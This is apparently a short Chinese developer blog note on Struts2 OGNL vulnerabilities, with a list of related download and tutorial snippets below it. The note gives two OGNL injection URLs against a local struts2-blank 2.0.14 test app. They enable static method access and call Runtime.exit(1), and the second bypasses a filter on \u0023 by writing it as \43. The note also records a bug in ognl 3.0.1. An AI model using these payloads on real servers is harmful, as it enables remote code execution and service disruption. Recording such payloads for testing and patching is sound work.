暂时mark在这,后面再补充
1. 关于漏洞的问题
http://localhost:8080/struts2-blank-2.0.14/example/HelloWorld.action
2.0.9不行
http://localhost:8080/struts2-blank-2.0.14/example/HelloWorld.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
2.0.14失效
仅过滤\u0023不行
http://localhost:8080/struts2-blank-2.0.14/example/HelloWorld.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('zz')(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(x))(zzxx))&('aaa')((('\43context.excludeProperties\u003dEMPTY_SET')('x'))(zzxx))&(asdf)(('@java.lang.Runtime@getRuntime().exit(1)')('z'))
2.ognl3.0.1的问题
升级到struts2.2.3之后,ognl3.0.1会产生一个小bug。 基本类型的参数,比如int,long,short,如果在请求参数中没有赋值,会抛出NosuchMethod的异常。
分享到:
相关推荐
struts2-xwork-ognl的源文件(jar包),在eclipse中导入就可以直接在eclipse中查看对应的源代码,(注:现在下载的struts2的开发包已不自带此文件)免费的啊
struts2-OGNL表达式测试代码
Struts2的OGNL表达式语言Object-Graph Navigation Language
struts2-xwork-ognl的javadoc文件,在Eclipse里直接导入,就可以实现随时查询功能。(注:现在下载的struts2的开发包已不自带此文件)
ognl-3.0.19.jar, org.apache.felix.framework-4.0.3.jar, org.apache.felix.main-4.0.3.jar, org.apache.felix.shell-1.4.3.jar, org.apache.felix.shell.tui-1.4.1.jar, org.osgi.compendium-4.0.0.jar, org.osgi....
mina-integration-ognl-2.0.0-M4.jar mina-integration-ognl-2.0.0-M4.jar
ognl-3.1.10.jar, org.apache.felix.framework-4.0.3.jar, org.apache.felix.main-4.0.3.jar, org.apache.felix.shell-1.4.3.jar, org.apache.felix.shell.tui-1.4.1.jar, org.osgi.compendium-4.0.0.jar, org.osgi....
struts2-2.0用到的核心jar包,包括commons-logging-1.0.4.jar,freemarker-2.3.8.jar,ognl-2.6.11.jar,struts2-core-2.0.14.jar,struts2-dojo-plugin-2.1.8.1.jar,xwork-2.0.7.jar
Struts2--5.OGNL
ognl-3.0.jar struts2-core-2.2.1.1.jar xwork-core-2.2.1.1.jar 共8个包,将其复制到/Struts2/WebRoot/WEB-INF/lib下面 方法二:(不用复制,导入法) (1).右击项目名称Struts2-->Build Path-->Configure ...
struts2--3.Ognl与值栈
struts.xml文件中新增以下内容: <!-- 为修复struts2 s2-016、s2-017漏洞,重写DefaultActionMapper --> ...ognl-2.6.11.jar直接覆盖掉原有文件。 使用工具进行测试漏洞是否依然存在。 2013年7月25日
Struts2学习计划5---Struts2_OGNL(对象图导航语言)的学习
struts2-core-2.1.8.jar;... ognl-2.7.3.jar; ognl-3.0.jar; commons-pool.jar; commons-fileupload-1.2.1.jar; commons-email-1.2.jar; commons-collections-3.1.zip; mysql-connector-java-5.1.6-bin.jar.
struts2-tiles-plugin-2.5.10.jar,tiles-api-3.0.7.jar,tiles-autotag-core-runtime-1.2.jar,tiles-core-3.0.7.jar,tiles-el-3.0.7.jar,tiles-freemarker-3.0.7.jar,tiles-jsp-3.0.7.jar,tiles-ognl-3.0.7.jar,tiles...
包含Struts2框架的核心类库,以及Struts2的第三方插件类库 struts2-core-2.0.14 xwork-2.0.7 ognl-2.6.11 commons-logging-1.0.4 freemarker-2.3.8 等等。
Struts2中ognl-2的源代码,从官网下载的
struts2 中 OGNL表达式的使用struts2 中 OGNL表达式的使用
NULL 博文链接:https://z-one.iteye.com/blog/1584602
Struts 2默认的表达式语言,